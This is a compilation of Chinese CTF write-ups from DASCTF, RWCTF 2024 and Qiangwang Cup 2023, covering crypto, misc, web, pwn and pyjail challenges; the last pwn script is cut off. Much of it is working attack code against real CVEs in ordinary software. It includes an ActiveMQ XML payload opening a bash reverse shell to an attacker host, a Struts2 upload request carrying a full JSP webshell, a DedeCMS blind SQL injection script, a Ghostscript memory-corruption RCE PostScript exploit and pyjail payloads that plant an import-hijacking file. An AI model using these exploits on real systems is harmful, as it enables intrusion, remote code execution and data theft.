农历新年的日期是20240210,密码就是这个,得到pass.txt

找不到secret压缩包的密码,只能一顿爆搜了:

得到:The password is DasrIa456sAdmIn987​,解密压缩包,发现大小刚好是10mb,怀疑是VC容器,结合上面的pass.txt​作为密钥文件,进行挂载

挂载成功,data.xlsx有密码,这个地方用到了我们最开始得到的密码das123admin321

解密之后观察xlsx:

直接从第8到了第10,怀疑有隐藏行:

flag:DASCTF{5476d4c4ade0918c151aa6dcac12d130}

CRYPTO

Or1cle

nc上之后,get_flag函数输入一串乱码

muchen@ubuntu:~/Desktop$ nc 1.14.108.193 32716

   _  __                                       __________        ___________ 
  | |/_/__ ___  ___  __ __    __              /\____;;___\      |          |
 _>  </ -_) _ \/ _ \/ // /   /o \________    | /  haruki /      |  flag    |
/_/|_|\__/_//_/_//_/\_, /    \_/       | |   .', ----. /|       |———————————
                   /___/                     ||     ||||        |
                                             \'.____.'||        |
                                              '--------'

1. get_signature
2. get_flag
3. gift
4. exit
2
sign: asuhdaih
An error occurred in /app/task.py at line 33 in verify: invalid literal for int() with base 16: b'asuhdaih'
23: self.P = self.d*secp256k1.G
24: 
25: def signature(self,msg):
26: h = int(hashlib.sha256(msg).hexdigest(),16)
27: k = h^self.d
28: r = (k*secp256k1.G).x
29: s = inverse(k,secp256k1.q) * (h + r*self.d) % secp256k1.q
30: return '%064x%064x' % (r, s)
31: 
32: def verify(self,z, signature):
33: r, s = int(signature[:64], 16), int(signature[64:], 16)
34: z = int(hashlib.sha256(z).hexdigest(), 16)
35: s_inv = pow(s, secp256k1.q - 2, secp256k1.q)
36: u1 = (z * s_inv) % secp256k1.q
37: u2 = (r * s_inv) % secp256k1.q
38: point = u1 * secp256k1.G + u2 * self.P
39: return point.x == r
40: 
41: banner = """
42: _  __                                       __________        ___________
43: | |/_/__ ___  ___  __ __    __              /\____;;___\      |          |
sth error

会跳出逻辑函数来,是个ecdsa和hnp问题,参考maple师傅写的tsjctf的这题

https://blog.maple3142.net/2022/02/28/tsjctf-2021-writeups/#signature

在改板子的时候注意到这样一行内容

return point.x == r

令r=0的话,那乘起来point点的横坐标也是0,写一串0进去非预期拿到flag

经过测试只要0的个数大于64都行

Or2cle

题目分为两个部分:

1.简化proof函数

2.通过success和fail筛选遍历

from pwn import *
from hashlib import sha256
from base64 import *
from sage.all import *

p = remote('1.14.108.193',30837)
p.recvuntil("s : ")
s = int(p.recvuntil("\n")[:-1])
p.recvuntil("Give me a hash:")
p.sendline(str(sha256(str(binomial(s+13,14)).encode()).hexdigest()))
p.recvuntil("3. exit\n")
p.sendline("1")
p.recvuntil('This is Your flag b\'')
enc = p.recvuntil("\'")[:-1]
flag = ""
c = b64decode(enc)

for i in range(50):
    for j in "0123456789abcdefDASCTF{}":
        p.recvuntil("3. exit\n")
        p.sendline("2")
        s = chr(c[i] ^ ord(j) ^ 2)
        tt = c[:i]+s.encode('latin1')+c[i+1:]
        p.sendline(tt)
        p.recvuntil("Dec")
        stand = p.recvuntil("\n")[:-1]
        if b"faild" in stand:
            flag += j
            break
    else:
        print("xxx")
    print(flag)

AI

AI-回声海螺

Flask框架,怀疑是模板注入

当询问的时候发送数据,会将数据传送到开放在7890端口的api服务下/api/chat​,

https://github.com/ansible/ansible/issues/18466

尝试了两次{{password}}​,第一次error,第二次就出了

数据安全

Cyan-1

https://mobile.moegirl.org.cn/zh/%E8%B5%9B%E5%B0%8F%E7%9B%90

在这基本都能找到

2024-Be-A-RWCTFer Partly WRITEUP By SanDieg0

Web:

Be-a-Security-Researcher:

CVE-2024-23897:https://github.com/CKevens/CVE-2024-23897

image-20240128110901052

Be-an-ActiveMq-Hacker:

CVE-2023-46604:https://github.com/evkl1d/CVE-2023-46604

在远程服务器上python3 -m http.server 2333开启监听,poc.xml文件:

<?xml version="1.0" encoding="UTF-8" ?>
    <beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
            <constructor-arg>
            <list>
                <value>bash</value>
                <value>-c</value>
                <value>bash -i >& /dev/tcp/ip/2333 0>&1</value>
            </list>
            </constructor-arg>
        </bean>
    </beans>

在远程服务器监听反弹shell端口,然后执行exploit.py文件命令:

python exploit.py -i ip -p port -u http://vps:port/poc.xml

弹到shell,/readflag:

image-20240128110630970

Be-a-Framework-Hacker:

https://www.freebuf.com/vuls/388137.html

image-20240128112924750

image-20240128112905180

Be-More-Elegant:

S2-066—Apache Struts2 文件上传漏洞(CVE-2023-50164)

上蚁剑jsp马,连接以后:

image-20240128114131313

POST /upload.action HTTP/1.1
Host: 47.99.57.31:8080
Content-Length: 1445
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://47.99.57.31:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8Ek3SkVvMpD6kmG9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://47.99.57.31:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=946161529AD54A0D3F20F0D18DDE0365
Connection: close

------WebKitFormBoundary8Ek3SkVvMpD6kmG9
Content-Disposition: form-data; name="FileUpload"; filename="shell.jsp"
Content-Type: text/plain

<%-- 使用时请删除此行, 连接密码: HzkmtBeH --%>
<%!
class SHADOWING extends ClassLoader{
  SHADOWING(ClassLoader c){super(c);}
  public Class global(byte[] b){
    return super.defineClass(b, 0, b.length);
  }
}
public byte[] atomic(String str) throws Exception {
  Class base64;
  byte[] value = null;
  try {
    base64=Class.forName("sun.misc.BASE64Decoder");
    Object decoder = base64.newInstance();
    value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });
  } catch (Exception e) {
    try {
      base64=Class.forName("java.util.Base64");
      Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
      value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });
    } catch (Exception ee) {}
  }
  return value;
}
%>
<%
String cls = request.getParameter("HzkmtBeH");
if (cls != null) {
  new SHADOWING(this.getClass().getClassLoader()).global(atomic(cls)).newInstance().equals(new Object[]{request,response});
}
%>
------WebKitFormBoundary8Ek3SkVvMpD6kmG9
Content-Disposition: form-data; name="fileUploadFileName";

../../../views/shell.jsp
------WebKitFormBoundary8Ek3SkVvMpD6kmG9--

image-20240128114113732

YourSqlTrick:

DedeCMS V5.7.110 SQL注入 :https://www.cnblogs.com/fuchangjiang/p/17678944.html

import requests

url = 'http://121.40.226.16:30080/tags.php?QUERY_STRING='

flag = ''
for i in range(1,4000):
    min = 30
    max = 127
    while min < max:
        mid = (min + max) // 2
        # 爆破表名 payload = "/alias/aaaaaaa'|| 1=\\Nunion select 2,if(ord(substr(group_concat(table_name),{},1))>{},1,null),3,4,5,6,7,8,0,10,11 from information_schema.tables where table_schema=0x64656465636d7376353775746638737032 and 1='1".format(i, mid)
        # 爆破列名 payload = "/alias/aaaaaaa'|| 1=\\Nunion select 2,if(ord(substr(group_concat(column_name),{},1))>{},1,null),3,4,5,6,7,8,0,10,11 from information_schema.columns where table_name=0x666c6167 and 1='1".format(i, mid)
        payload = "/alias/aaaaaaa'|| 1=\\Nunion select 2,if(ord(substr(group_concat(flag_value),{},1))>{},1,null),3,4,5,6,7,8,0,10,11 from flag where 1='1".format(i, mid)

        res = requests.get(url + payload)
        if 'DedeCMS提示信息' in res.text:
            min = mid + 1
        else:
            max = mid
    flag += chr(min)
    print(flag)

image-20240128114544202

pwn

vision

bin目录下的有flag文件和main_static文件

直接利用后面的读取的部分,然后打印出flag既可

import os
import sys
import time
from pwn import *
from ctypes import *

context.os = 'linux'
context.log_level = "debug"

#context(os = 'linux',log_level = "debug",arch = 'amd64')
s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num                :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
l64     = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
l32     = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,b"\x00"))
context.terminal = ['gnome-terminal','-x','sh','-c']

x64_32 = 1

if x64_32:
    context.arch = 'amd64'
else:
    context.arch = 'i386'
#p=remote('47.96.229.249',30574)
p = process('./main_static')
elf = ELF('./main_static')

libcc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

libcc.srand(libcc.time(0))
a = libcc.rand()
ru('Welcome to the debug console! Use "help" to see supported commands. \n')
pl='openthedoor -k '+str(a)
sl(pl)
ru('Fail to get shell!\n')
sl('sh flag')
p.interactive()

Be-an-Interpreter-Hacker

CVE-2023-28879

通过ghostscript-10.01.0版本找到文章

https://blog.csdn.net/murphysec/article/details/130227359

然后去找github上的poc

https://github.com/AlmondOffSec/PoCs/tree/master/Ghostscript_rce

翻译一下就是,用getoffset.py对gs进行运算,然后获得偏移量,然后生成新的final-poc.ps
然后16进制的payload在final-poc.ps的73行

这里就直接按照dockerfile的命令去编译一下

tar xzvf ghostscript-10.01.0.tar.gz 
cd ./ghostscript-10.01.0 
./configure 
make 

然后把bin文件夹下的gs复制出来

修改一下offset.py

#!/usr/bin/env python
# python offset.py /path/to/gs/binary
# or
# python offset.py /path/to/libgs

# thanks to Laluka for the help

from pwn import *
from sys import argv

if len(argv) != 2:
    print("Usage: python {argv[0]} /path/to/gs_bin or libgs")
    exit(1)

#p = process('./gs')
elf_path = argv[1]

# Load the ELF file
elf = ELF("./gs")

# Get the address of the PLT
init_addr = elf.get_section_by_name('.init').header.sh_addr
print(".init start address: 0x{:x}".format(init_addr))

# Get the address of system@plt
system_plt_addr = elf.plt['system']
print("system@PLT address: 0x{:x}".format(system_plt_addr))
libc_plt_offset = system_plt_addr - init_addr
print("Offset from .init start addr to system@plt: 0x{:x} == {:d}".format(libc_plt_offset, libc_plt_offset))

f_addr_s_std_noseek = elf.functions["s_std_noseek"]
print("f_addr_s_std_noseek address: 0x{:x}".format(f_addr_s_std_noseek.address))
f_addr_s_std_noseek_offset = f_addr_s_std_noseek.address - init_addr
print("Offset from .init start addr to f_addr_s_std_noseek: 0x{:x} == {:d}".format(f_addr_s_std_noseek_offset, f_addr_s_std_noseek_offset))

with open("final-poc.ps.template", "r") as f:
    final_file = f.read().strip()

final_file = final_file.replace("F_ADDR_S_STD_NOSEEK_OFFSET", str(f_addr_s_std_noseek_offset))
final_file = final_file.replace("LIBC_PLT_OFFSET", str(libc_plt_offset))

with open("final-poc.ps", "w") as f:
    f.write(final_file)

print("Now try to upload the final-poc.ps")

现在得到了新的final-poc.ps.template​,然后把73行改成sh既可以,16进制是7368

10000000 setvmthreshold
% (a) (b) -> (ab) 
/concatstrings { exch dup length 
 2 index length add string 
 dup dup 4 2 roll copy length
 4 -1 roll putinterval
} bind def

% (aabb) -> (bbaa)
/reverse{
 /str exch def
 /temp str 0 get def
 /i 0 def
 str length 2 idiv{
  /temp str i get def
  str i str str length i sub 1 sub get put
  str str length i sub 1 sub temp put
  /i i 1 add def
 }repeat
 str 
}def
%offset addr -> addr+offset
/addOffset{
 exch (16#) exch concatstrings
 cvi
 add
 16 16 string cvrs
}def
% addr offset -> addr-offset
/subOffset{
 exch (16#) exch concatstrings
 cvi
 exch
 sub
 16 16 string cvrs
}def
% - -> a long string
/createOverflow {
 ()
 1 1 2045 {pop <41> concatstrings}for
 <1313> concatstrings %escaped char
 revision 9560 ge 
 {1 1 15 {pop <42> concatstrings} for}
 {1 1 23 {pop <42> concatstrings} for}
 ifelse
}def

/leakAsString{
 /myString 16 string def
 /asciiToHexFilter myString /ASCIIHexEncode filter def
 asciiToHexFilter exch writestring
 asciiToHexFilter flushfile
 myString
}def

% (0xstring) --> ascii string
/stringToAddress{
 % from 0x231 to 0x0231, otherwise the filter understand 0x23 then 0x10
 dup length 2 mod 1 eq {(0) exch concatstrings}if
 /ASCIIHexDecode filter
 8 string readstring
 pop
 reverse
 % from 0xdeadbeef to 0x00000000deadbeef
 {dup length 8 eq {exit} {<00> concatstrings }ifelse}loop 
}def
% - -> a 8 bytes leak from the heap (i/o pool)
/leakMemory{
 /leakBuffer 10000 string def
 /leakMemoryFilter leakBuffer /NullEncode filter /BCPEncode filter def
 createOverflow
 <7368004343434343> concatstrings % s->templat (your payload goes here)
 <4444444444444444> concatstrings % s->memory
 <4545454545454545> concatstrings % s->report_error
 <4646464646464646> concatstrings % s->min_left
 1 1 80{pop <47> concatstrings }  for% s->error_string
 <4848484848484848> concatstrings % s->cursor->r->ptr
 leakMemoryFilter exch writestring
 leakMemoryFilter flushfile
 revision 9560 ge 
 {/leak leakBuffer 2176 8 getinterval def}
 {/leak leakBuffer 2184 8 getinterval def}
 ifelse
 leak
 reverse
} def

% what where -> -
/writewhatwhere {
 createOverflow
 <4343434343434343> concatstrings % s->templat
 <4444444444444444> concatstrings % s->memory
 <4545454545454545> concatstrings % s->report_error
 <4646464646464646> concatstrings % s->min_left
 1 1 80 {pop <47> concatstrings }  for% s->error_string
 <4848484848484848> concatstrings % s->cursor->r->ptr 
 exch concatstrings  % (where) s->cursor->r->limit -  also update s->cursor->w->ptr
 <4444444444444444> concatstrings % s->cursor->w->limit
 <4545454545454545> concatstrings % s->cbuf.  
 /openWriteFilter 5000 string /NullEncode filter /BCPEncode filter def
 openWriteFilter exch writestring
 openWriteFilter flushfile
 openWriteFilter exch writestring
}def

/readProc{
    leakMemory
    leakAsString
    dup (Found leak: 0x) exch concatstrings (\n) concatstrings print
    revision 9560 ge 
    {dup 375 subOffset} %start of bcpe stream}
    {dup 383 subOffset} 
    ifelse
    dup (BCPE stream: 0x) exch concatstrings (\n) concatstrings print
    dup 111 addOffset %start of read cursor-1
    dup (Start of read cursor -1 : 0x) exch concatstrings (\n) concatstrings print
    dup 81 addOffset %start of proc
    dup (Proc 0x) exch concatstrings (\n) concatstrings print
    dup 64 addOffset
    stringToAddress exch stringToAddress exch concatstrings
    exch stringToAddress
    writewhatwhere
    leakMemoryFilter () writestring leakMemoryFilter flushfile
    leakBuffer
    revision 9560 ge
    {2191 8 getinterval reverse leakAsString}
    {2199 8 getinterval reverse leakAsString}
    ifelse  
    dup (Found leak proc: 0x) exch concatstrings (\n) concatstrings print
}def 

readProc
1154176 subOffset
dup (Base r-x: 0x) exch concatstrings (\n) concatstrings print
6164 addOffset
dup (system@plt: 0x) exch concatstrings (\n) concatstrings print
exch 231 addOffset
dup (process : 0x) exch concatstrings (\n) concatstrings print
stringToAddress exch stringToAddress exch
writewhatwhere
leakMemoryFilter (aa) writestring leakMemoryFilter flushfile

然后我们md5绕过后进行远程就可以

import hashlib

for i in range(100000000):
    original_md5 = hashlib.md5(str(i).encode("utf-8")).hexdigest()

    if original_md5[:5] == '02cba':
        print(i)

远程连接后输入poc即可

2023强网杯S7 WRITEUP By 你说把爱渐渐放下会走更远

你说把爱渐渐放下会走更远,或许命运的签只让我们遇见~
——《不能说的秘密》

MISC

Wabby Wabbo Radio

f12控制台,发现wav的路由,xh1-5 wav左声道是长短音,右边是戴夫,左右音频都是莫斯,解密出来是一段话IF YOU DON'T KNOW HOW TO DO IT,YOU CAN GO AHEAD AND DO SOMETHING ELSE FIRST

这个地方随手猜了一下,发现有flag.wav,还有hint1和hint2 wav,莫斯解出来两个提示:

HINT1:DO YOU KNOW QAM?

HINT2:MAYBE FLAG IS PNG PICTURE

查看一下这个flag.wav

https://www.zhihu.com/question/278998195

https://ctftime.org/writeup/21167

其实无论是什么QAM,都是要以4bit位进行的

然后我们看一下星座图

由于QAM是对振幅进行调制,所以我们可以从振幅入手进行解调:

我以为是要做星座图,结果不是,卡住了,后来感觉要按照文章里写的爆一下对应方式,结果转换成0123

import scipy.io.wavfile as wav
from Crypto.Util.number import long_to_bytes

def to_int(x):
    """
    将浮点数转换为最接近的整数。
    """
    if x > 0:
        return int(x + 0.5)
    else:
        return int(x - 0.5)

def process(raw_data):
    """
    处理音频数据,将每个采样点的声道值进行转换。
    """
    data = []
    for i in raw_data:
         # 将每个声道的值进行处理并添加到新的数据列表中
        data.append((to_int(i[0]) * 2 + 6) // 4)
        data.append((to_int(i[1]) * 2 + 6) // 4)
    return data

def convert(data):
    """
    将处理过的音频数据转换为字节对象。
    """
    n = 0
    for i in data:
        # 将处理过的数据拼接成一个整数
        n <<= 2
        n += i
    return long_to_bytes(n)

def main():
    _, raw = wav.read('flag.wav')
    print("Raw Audio Data:", raw)
    # 处理音频数据
    data = process(raw)
    print("Processed Data:",data)
    # 将处理过的音频数据转换为字节对象
    byte = convert(data)
    print("Converted Byte Data:",byte)

if __name__ == "__main__":
    main()

然后输出到图片就好了

easyfuzz

九位保证前两个是1,然后前两位是什么都可以,第三位是q,第四位是w,第五位就能直接盲猜出b了,挨着爆破后四位就好

from pwn import *

context.log_level = 'debug'
p = remote('101.200.122.251', 12177)

s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num                :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
'''
for i in range(0x41,0x7a):
     sla('Enter a string (should be less than 10 bytes): ', '11qwb'+chr(i)+'aaa')
     ru('Here is your code coverage: ')
     if(b'111111000' in r(100)):
          print('OKKKK')
          print(chr(i))
          p.close()

for i in range(0x41,0x7a):
     sla('Enter a string (should be less than 10 bytes): ', '11qwbG'+chr(i)+'aa')
     ru('Here is your code coverage: ')
     if(b'111111100' in r(100)):
          print('OKKKK')
          print(chr(i))
          p.close()

for i in range(0x41,0x7a):
     sla('Enter a string (should be less than 10 bytes): ', '11qwbGo'+chr(i)+'a')
     ru('Here is your code coverage: ')
     if(b'111111110' in r(100)):
          print('OKKKK')
          print(chr(i))
          p.close()
'''
for i in range(0x41,0x7a):
     sla('Enter a string (should be less than 10 bytes): ', '11qwbGoo'+chr(i))
     ru('Here is your code coverage: ')
     if(b'111111111' in r(100)):
          print('OKKKK')
          print(chr(i))
          p.close()

谍影重重3.0

搜索纸飞机 vpn

弹出了shadowsocks,看一下:

应该就是这个了

https://www.ichenxiaoyu.com/ss/

https://wonderkun.cc/2020/02/18/shadowsocks%E7%9A%84%E9%80%9A%E4%BF%A1%E5%8E%9F%E7%90%86%E4%BB%A5%E5%8F%8A%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95%E5%88%86%E6%9E%90/

通过这个函数,知道发送的数据前 decipher_iv_len​ 是加密所用的初始iv的长度,我这里用的加密算法是 aes-256-cfb​,跟一下代码知道这里 decipher_iv_len​ 是16。

可以先用tshark提取出所有的data,然后解密,但是不知道密钥,所以需要爆破了:

需要用到shadowsocks这个库

from shadowsocks import cryptor

def decrypt_data(hex_string, password):
    """
    解密给定的十六进制字符串,使用提供的密码进行解密
    """
    data = bytes.fromhex(hex_string)
    enc = cryptor.Cryptor(password, 'aes-256-cfb')
    decrypted_data = enc.decrypt(data)
    return decrypted_data

def find_password(hex_string, password_file_path):
    """
    在给定密码文件中查找正确的密码,并解密十六进制字符串,检查是否包含字节序列 b'HTTP'
    """
    with open(password_file_path, 'rb') as file:
        # 逐行读取密码列表
        passwords = map(str.strip, map(bytes.decode, file.readlines()))

    for password in passwords:
        decrypted_data = decrypt_data(hex_string, password)

        # 检查解密后的数据中是否包含字节序列 b'HTTP'
        if b'HTTP' in decrypted_data:
            # 如果包含,则打印密码和解密后的数据
            print("Found Password:", password)
            print("Decrypted Data:", decrypted_data.decode())
            # 可以选择在找到密码后终止循环
            break

if __name__ == "__main__":
    # 替换为实际的十六进制字符串和密码文件路径
    hex_string_to_decrypt = ""
    password_file_path = "300mima.txt"

    find_password(hex_string_to_decrypt, password_file_path)

因为不知道到底哪个数据包传输的内容是 http 协议,所以需要多试几次,直到解密成功一个为止。 一旦解密成功,就可以知道一段密文分组经过key加密之后的值,就可以反解出key,进而破解所有数据包。

结果第四个就是HTTP,密钥:superman,

GET /Why-do-you-want-to-know-what-this-is HTTP/1.1
Host: 192.168.159.131
User-Agent: curl/8.4.0
Accept: */*
Connection: close

Why-do-you-want-to-know-what-this-is​md5一下就是flag

谍影重重2.0

https://mode-s.org/decode/content/ads-b/1-basics.html

按照所说,是从hex编码8D之后进行截取,发现length==67的数据包才有8D,筛选导出每个tcp对应数据然后解密:

import pyModeS as pms #单个进行提取,反正也不多,可以手撕
pms.tell("")

(其中之一运行结果)

找到之后,ICAO address要大写计算md5才可以,卡了这个地方好久

Happy Chess

非预期,随便走九次然后exit就success可以直接进入下一关

Pyjail ! It's myFILTER !!!

这道题目环境变量里有非预期,后面也上了 revenge,这里这道题目可以直接通过读环境变量看到 flag

input_code = eval(f"f'{input_code}'")

需要我们利用的就是这里的这个 eval 中的 format,我们的 input 会替换掉这里的 {input_code}

源码中给出了一系列的黑名单,方法禁用等等,同时在最后还写了一个必须要存在 {} 的逻辑,且长度不能小于65

open、read、print 都没被禁用,这里我们可以利用这里的拼接,前后闭合一下直接读,不过这里需要注意前后拼接的时候类型要一直,套个str

{1}'+str(print(open("/proc/self/environ").read()))+'

Pyjail ! It's myRevenge !!!

修了环境变量,但是上面的读文件没有修改,不过留下了一个 start.sh 让人死心:

#!/bin/sh
# Add your startup script

# # CMD sed -i "s/FLAG/$ICQ_FLAG/" /home/ctf/flag* && unset ICQ_FLAG && rm -rf /etc/profile.d/pouchenv.sh && rm -rf /etc/instanceInfo && socat TCP-L:9999,fork,reuseaddr EXEC:"python3 ./server.py",pty,stderr,setsid,sane,raw,echo=0

# FLAG_PATH=/flag
FLAG_PATH=/home/ctf/flag_`hexdump -n 32 -v -e '/1 "%02X"' /dev/urandom`
FLAG_MODE=M_ECHO
if [ ${ICQ_FLAG} ];then
    case $FLAG_MODE in
        "M_ECHO")
            echo -n ${ICQ_FLAG} > ${FLAG_PATH}
            FILE_MODE=755 # 注意这里的权限,flag的权限一定要注意,是所有用户可读,还是只有root可读
            chmod ${FILE_MODE} ${FLAG_PATH}
            ;;
        "M_SED")
            #sed -i "s/flag{x*}/${ICQ_FLAG}/" ${FLAG_PATH}
            sed -i -r "s/flag\{.*\}/${ICQ_FLAG}/" ${FLAG_PATH}
            ;;
        "M_SQL")
            # sed -i -r "s/flag\{.*\}/${ICQ_FLAG}/" ${FLAG_PATH}
            # mysql -uroot -proot < ${FLAG_PATH}
            ;;
        *)
            ;;
    esac
    echo [+] ICQ_FLAG OK
    unset ICQ_FLAG
else
    echo [!] no ICQ_FLAG
fi

#del eci env
rm -rf /etc/profile.d/pouchenv.sh
rm -rf /etc/instanceInfo

#clear fd
rm -rf /start.sh /root/start.sh

socat TCP-L:9999,fork,reuseaddr EXEC:"python3 ./server_8F6C72124774022B.py",pty,stderr,setsid,sane,raw,echo=0 &
exec tail -f /dev/null

可以看到 FLAGPATH=/home/ctf/flaghexdump -n 32 -v -e '/1 "%02X"' /dev/urandom​,这样就必须要rce了

延续上面题目的思路,这里是先发现了可以写文件,但是当前文件占用了,而且存在黑名单和长度限制不好利用。

这里只禁用了一些基类,list globals 等能够用来取类的函数方法并没有禁用,简单查看一下可以发现我们的黑名单参数是存在 global 里的,同时想到了 clear 函数没有禁用,中括号也没有禁用,我们可以直接把黑名单取出来 clear 掉

但是就算取出来了我们的长度也是不能完成后续操作的,又卡住了一段时间

突然看到这里是个 while 循环,那么我们的内容实际上是会执行多次的,如果还能够执行的话,这里题目中给出的格式化字符串利用给了提示,这样就可以通过 input 在清空之后再进行后续利用了,

然后就想到了一开始的写文件,

这里能写敏感文件了之后的应用就比较常规了,我们可以在当前目录下写一个程序 import 的库文件,这样程序会优先import 我们写的文件

直接写一个文件肯定是不行的 长度不够,还是要分多次写然后用read读出来一次写进去如下:

{1}'+str(list(globals().values())[-2].clear())+'f"{inp'+'ut()}"
'+str(open('1','w').write('import os'))+'{1}
{1}'+str(list(globals().values())[-2].clear())+'f"{inp'+'ut()}"
'+str(open('1','a').write(';print(os'))+'{1}
{1}'+str(list(globals().values())[-2].clear())+'f"{inp'+'ut()}"
'+str(open('1','a').write('.popen(\''))+'{1}
{1}'+str(list(globals().values())[-2].clear())+'f"{inp'+'ut()}"
'+str(open('1','a').write('cat f*>f'))+'{1}
{1}'+str(list(globals().values())[-2].clear())+'f"{inp'+'ut()}"
'+str(open('1','a').write('\')'))+'{1}
{1}'+str(list(globals().values())[-2].clear())+'f"{inp'+'ut()}"
'+str(open('1','a').write('.read())'))+'{1}
{1}'+str(print(open("1").read()))+'

构造好了如上 payload ,将这个 payload 往一个程序可以 import 的文件中写即可,

{1}'+str(list(globals().values())[-2].clear())+'f"{inp'+'ut()}"
'+str(open('pty.py','w').write(open('1').read()))+'{1}
{1}'+str(list(globals().values())[-2].clear())+'f"{inp'+'ut()}"
'+str(print(open("pty.py").read()))+'{1}

'+str(print(open("f").read()))+'{1}

此时已经完成 import pty中我们的恶意代码, cat 完 flag 了,直接去读我们写出来的 f 即可

REVERSE

ezre

sm4加密

看到ok字符串,向上查找调用函数

通过此特征判断为sm4加密,

v14是密文,v15是key,在线网站解密

CRYPTO

not only rsa

遇事不决分解n

p=91027438112295439314606669837102361953591324472804851543344131406676387779969

得到p**5

phin也就很简单了

gcd一看有公因子有限域开根即可

得到flag

from Crypto.Util.number import *
from gmpy2 import gcd
n = 6249734963373034215610144758924910630356277447014258270888329547267471837899275103421406467763122499270790512099702898939814547982931674247240623063334781529511973585977522269522704997379194673181703247780179146749499072297334876619475914747479522310651303344623434565831770309615574478274456549054332451773452773119453059618433160299319070430295124113199473337940505806777950838270849
e = 641747
c = 730024611795626517480532940587152891926416120514706825368440230330259913837764632826884065065554839415540061752397144140563698277864414584568812699048873820551131185796851863064509294123861487954267708318027370912496252338232193619491860340395824180108335802813022066531232025997349683725357024257420090981323217296019482516072036780365510855555146547481407283231721904830868033930943
p = 91027438112295439314606669837102361953591324472804851543344131406676387779969

phi =(p**5)-(p**4)
print(gcd(e,phi))

m = Zmod(p ** 5)(c).nth_root(e,all=True)

for i in m:
    flag = long_to_bytes(int(i))
    if b'flag{' in flag:
        flag= flag.decode()
        print(flag)

discrete_log

尝试直接用pohlig-hellman,发现p-1不光滑

采用中间相遇思想进行爆破

import itertools
from Crypto.Util.number import *

p = 173383907346370188246634353442514171630882212643019826706575120637048836061602034776136960080336351252616860522273644431927909101923807914940397420063587913080793842100264484222211278105783220210128152062330954876427406484701993115395306434064667136148361558851998019806319799444970703714594938822660931343299
g = 5
c = 105956730578629949992232286714779776923846577007389446302378719229216496867835280661431342821159505656015790792811649783966417989318584221840008436316642333656736724414761508478750342102083967959048112859470526771487533503436337125728018422740023680376681927932966058904269005466550073181194896860353202252854
l = 12
flag_template = 'flag{' + '\x00' * l + '}'
flag_template1 = flag_template + (128 - len(flag_template)) * chr(128 - len(flag_template))
tmp = pow(g,bytes_to_long(flag_template1.encode()),p)
c_ = c * inverse(int(tmp),p) % p
c_ = pow(c_,inverse(256 ** (128 - len(flag_template)+1),(p - 1) // 2),p)

ssss = {}

gshift = pow(g,256 ** (l//2),p)
from tqdm import tqdm
table = "0123456798abcdef"
for each in tqdm(itertools.product(table,repeat=l//2)):
    preflag = ''.join(i for i in each)
    #print(preflag)
    pre = bytes_to_long(preflag.encode())
    cc = c_ * inverse(int(pow(gshift,pre,p)),p) % p
    ssss[cc] = preflag

for each in tqdm(itertools.product(table,repeat=l//2)):
    tailflag = ''.join(i for i in each)
    tail = bytes_to_long(tailflag.encode())
    cc = pow(g,tail,p)
    if cc in ssss:
        print(ssss[cc]+tailflag)
        exit()

PWN

chatting

import os
import sys
import time
from pwn import *
from ctypes import *

p = remote('101.200.122.251', 14509)
elf = ELF('./pwn')
libc = ELF('./libc-2.27.so')

#==================================================#

s       = lambda data               :p.send(data)
sa      = lambda text, data         :p.sendafter(text, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda text, data         :p.sendlineafter(text, data)
r       = lambda num                :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4, b"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8, b"\x00"))
lg      = lambda s                  :p.success('\033[32m%s -> 0x%x\033[0m' % (s, eval(s)))
lgl     = lambda s, value           :p.success('\033[32m%s -> 0x%x\033[0m' % (s, value))
itr     = lambda                    :p.interactive()

#==================================================#

context.os = 'linux'
context.log_level = "debug"
context.arch = 'amd64'

def add(username):
        p.sendlineafter('listuser, exit): ','add')
        p.sendlineafter('Enter new username: ',username)

def delete(username):
        p.sendlineafter('listuser, exit): ','delete')
        p.sendlineafter('Enter username to delete: ',username)

def switch(username):
        p.sendlineafter('listuser, exit): ','switch')
